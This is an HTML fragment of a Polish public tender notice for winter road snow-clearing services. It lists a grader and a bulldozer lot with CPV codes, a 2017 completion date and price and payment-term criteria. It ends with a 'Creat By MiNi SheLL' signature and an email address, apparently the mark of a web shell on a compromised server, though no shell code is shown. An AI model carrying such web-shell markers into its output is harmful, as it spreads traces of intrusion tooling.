                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>równiarka do odśnieżania dróg ( ulic )<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zamawiający wymaga aby równiarka wyposażona była w czołowy pług dwustronny. Świadczenie usług obejmować będzie odśnieżanie dróg w okresie wystąpienia obfitych opadów śniegu nagromadzonego przy krawędzi jezdni w kierunku rowu przydrożnego , usuwania z jezdni błota pośniegowego .  <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>10
                  
                <b>Nazwa: </b>spycharka do odśnieżania dróg.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wymagana jest spycharka z silnikiem o mocy powyżej 50 kM . Usługi odśnieżania świadczone będą wówczas gdy będące w dyspozycji zamawiającego pługi odśnieżne zamontowane na środkach transportu nie będą w stanie zapewnić utrzymania przejezdności dróg, bądź tworzenia się zasp śnieżnych na drogach .<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com